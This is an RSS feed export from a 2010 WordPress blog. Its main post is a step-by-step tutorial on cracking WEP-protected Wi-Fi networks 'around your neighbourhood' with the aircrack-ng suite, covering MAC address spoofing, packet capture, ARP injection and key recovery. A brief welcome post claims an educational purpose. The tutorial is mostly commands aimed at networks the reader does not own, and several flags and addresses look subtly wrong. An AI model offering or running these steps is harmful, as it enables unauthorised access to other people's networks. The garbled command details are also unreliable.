<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	xmlns:georss="http://www.georss.org/georss" xmlns:geo="http://www.w3.org/2003/01/geo/wgs84_pos#" xmlns:media="http://search.yahoo.com/mrss/"
	>

<channel>
	<title>It&#039;s all bout technology</title>
	<atom:link href="http://techandhack.wordpress.com/feed/" rel="self" type="application/rss+xml" />
	<link>http://techandhack.wordpress.com</link>
	<description>Just another WordPress.com weblog</description>
	<lastBuildDate>Wed, 10 Feb 2010 18:16:22 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.com/</generator>
<cloud domain='techandhack.wordpress.com' port='80' path='/?rsscloud=notify' registerProcedure='' protocol='http-post' />
<image>
		<url>http://s2.wp.com/i/buttonw-com.png</url>
		<title>It&#039;s all bout technology</title>
		<link>http://techandhack.wordpress.com</link>
	</image>
	<atom:link rel="search" type="application/opensearchdescription+xml" href="http://techandhack.wordpress.com/osd.xml" title="It&#039;s all bout technology" />
	<atom:link rel='hub' href='http://techandhack.wordpress.com/?pushpress=hub'/>
		<item>
		<title>[Tutorial] Hacking Wifi</title>
		<link>http://techandhack.wordpress.com/2010/02/10/tutorial-hacking-wifi/</link>
		<comments>http://techandhack.wordpress.com/2010/02/10/tutorial-hacking-wifi/#comments</comments>
		<pubDate>Wed, 10 Feb 2010 18:09:56 +0000</pubDate>
		<dc:creator>xiaomahe</dc:creator>
				<category><![CDATA[Hacking]]></category>
		<category><![CDATA[Aircrack]]></category>
		<category><![CDATA[airmon]]></category>
		<category><![CDATA[backtrack]]></category>
		<category><![CDATA[computer]]></category>
		<category><![CDATA[cracking]]></category>
		<category><![CDATA[how]]></category>
		<category><![CDATA[linux]]></category>
		<category><![CDATA[mac address]]></category>
		<category><![CDATA[PSK]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[technology]]></category>
		<category><![CDATA[to]]></category>
		<category><![CDATA[WEP]]></category>
		<category><![CDATA[Wifi]]></category>
		<category><![CDATA[wireless]]></category>
		<category><![CDATA[WPA]]></category>

		<guid isPermaLink="false">http://techandhack.wordpress.com/?p=3</guid>
		<description><![CDATA[So, everyone knows about wireless connection / wifi around their neighbourhood. Some of them are not secured at all, in which make this tutorial useless. Read more if you want to understand how it worksOK, when u tried to connect to Wifi around your neighbourhood, some of them are security protected. Types of wireless security [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=techandhack.wordpress.com&amp;blog=11930605&amp;post=3&amp;subd=techandhack&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>So, everyone knows about wireless connection / wifi around their neighbourhood. Some of them are not secured at all, in which make this tutorial useless. Read more if you want to understand how it works<span id="more-3"></span>OK, when u tried to connect to Wifi around your neighbourhood, some of them are security protected.</p>
<p>Types of wireless security found in router nowadays:</p>
<p>1. WEP [ Wired Equivalent Privacy ] &#8211; This is the weakest security that protect a wireless connection from being hacked by professional or amateur hacker.</p>
<p>2. WPA+PSK [ Wifi Protected Access + PreShared Key ] &#8211; This is currently the strongest security that can be applied to your wireless connection. Some said that these can be hacked, but require much time to accomplish.</p>
<p>So, basically this tutorial is going to teach you on how to hack Wifi connection with WEP protected. How to identify the security? easy, just hover to the wireless connection, and it will show you what kind of security it has.</p>
<p>In order to follow this tutorial, you must have at least backtrack 3 installed in your machine. You can get the latest backtrack version <a title="Backtrack 4 Final Release" href="http://www.backtrack-linux.org/downloads/" target="_blank">here</a> [Latest version is Backtrack 4 Final Release]</p>
<p>Ok, this tutorial used backtrack 3 to accomplish the hacking session.</p>
<p>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;-</p>
<p>1. Open up a shell command, by clicking the little blackbox next to the start button</p>
<p>2. First thing to do is stop our wireless card, type this in the shell command</p>
<p>* <strong>airmon-ng stop wlan0</strong> &#8212;&gt; do check what is your wireless device by typing <strong>iwconfig</strong> in the shell command, in my case, my wireless device in wlan0.</p>
<p>* Now put the wireless card down to make a fake mac address</p>
<p>Type :<strong> ifconfig wlan0 down</strong></p>
<p>* Now change the mac address</p>
<p>Type : <strong>macchanger -mac 00:11:22:33:44:55 wlan0</strong></p>
<p>* Start the wireless card</p>
<p>Type :<strong> airmon-ng start wlan0</strong></p>
<p>3. Now let&#8217;s start looking for AP [Access Point]</p>
<p>Type : <strong>airodump-ng wlan0</strong></p>
<p>4. After you see the AP&#8217;s lists on the left side.  Copy the BSSID or write down on a paper. Example : 00:1c:23:41:34</p>
<p>5. Open another shell</p>
<p>Type : <strong>airodump-ng -c 6 -w WIFIHACK -bssid 00:1c:23:41:34 wlan0</strong></p>
<blockquote><p><strong>&#8220;take a look at data. If the number is keep going at the first time you use the airdump-ng, means you do not need to inject it with ARP. But if the number is very slowly increasing, you need to inject it with ARP&#8221;</strong></p></blockquote>
<p>6. Open another shell again, this time we are going to create more data with ARP Injection, so we don&#8217;t have to wait for the data to come to us, but we make it to come to us.</p>
<p>Type in the new shell : <strong>aireplay-ng -l 0 -a 00:1c:23:41:34 -h 00:11:22:33:44:55 wlan0</strong></p>
<p>7. Inject the router in a new shell again</p>
<p>Type : <strong>aireplay-ng -3 -b 00:1c:23:41:34 -h 00:11:22:33:44:55 wlan0</strong></p>
<p>8. Processes number 6 and 7 takes a while to actually inject. Check the data in process number 5, if the &#8220;data&#8221; is increasing rapidly means the injection is success.</p>
<p>9. Wait for the data to be around 100k and above, and you can start cracking the key</p>
<p>Type in new shell :<strong> aircrack-ng -n 64 -bssid 00:1c:23:41:34 WIFIHACK-01.cap</strong></p>
<p>Once you crack it down, write the password down on a paper.</p>
<p>It will looks like this when it is cracked with aircrack : <strong>11:CD:21:92:34</strong></p>
<p>but when you type in the password, type: <strong>11CD219234</strong></p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/techandhack.wordpress.com/3/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/techandhack.wordpress.com/3/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/techandhack.wordpress.com/3/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/techandhack.wordpress.com/3/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/techandhack.wordpress.com/3/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/techandhack.wordpress.com/3/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/techandhack.wordpress.com/3/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/techandhack.wordpress.com/3/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/techandhack.wordpress.com/3/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/techandhack.wordpress.com/3/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/techandhack.wordpress.com/3/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/techandhack.wordpress.com/3/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/techandhack.wordpress.com/3/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/techandhack.wordpress.com/3/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=techandhack.wordpress.com&amp;blog=11930605&amp;post=3&amp;subd=techandhack&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://techandhack.wordpress.com/2010/02/10/tutorial-hacking-wifi/feed/</wfw:commentRss>
		<slash:comments>10</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/e88493d9f36227155a4f2f881bae8be9?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">xiaomahe</media:title>
		</media:content>
	</item>
		<item>
		<title>Hello world!</title>
		<link>http://techandhack.wordpress.com/2010/02/09/hello-world/</link>
		<comments>http://techandhack.wordpress.com/2010/02/09/hello-world/#comments</comments>
		<pubDate>Tue, 09 Feb 2010 03:34:05 +0000</pubDate>
		<dc:creator>xiaomahe</dc:creator>
				<category><![CDATA[Announcement]]></category>

		<guid isPermaLink="false"></guid>
		<description><![CDATA[Hi, this is just another blog of mine where i want to share some tips and tutorials in terms of computer security and forensic. Hope you will enjoy your stay in this website, and keep supporting me by keep coming back here to check out the latest news, tips, tutorials, etc. All of these is [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=techandhack.wordpress.com&amp;blog=11930605&amp;post=1&amp;subd=techandhack&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>Hi, this is just another blog of mine where i want to share some tips and tutorials in terms of computer security and forensic.</p>
<p>Hope you will enjoy your stay in this website, and keep supporting me by keep coming back here to check out the latest news, tips, tutorials, etc.</p>
<p>All of these is used for educational purposes only, and to help us understanding more on computer security issues and how we can protect ourselves from danger.</p>
<p>Thanks,</p>
<p>Mahendra</p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/techandhack.wordpress.com/1/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/techandhack.wordpress.com/1/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/techandhack.wordpress.com/1/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/techandhack.wordpress.com/1/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/techandhack.wordpress.com/1/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/techandhack.wordpress.com/1/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/techandhack.wordpress.com/1/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/techandhack.wordpress.com/1/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/techandhack.wordpress.com/1/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/techandhack.wordpress.com/1/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/techandhack.wordpress.com/1/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/techandhack.wordpress.com/1/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/techandhack.wordpress.com/1/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/techandhack.wordpress.com/1/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=techandhack.wordpress.com&amp;blog=11930605&amp;post=1&amp;subd=techandhack&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://techandhack.wordpress.com/2010/02/09/hello-world/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/e88493d9f36227155a4f2f881bae8be9?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">xiaomahe</media:title>
		</media:content>
	</item>
	</channel>
</rss>
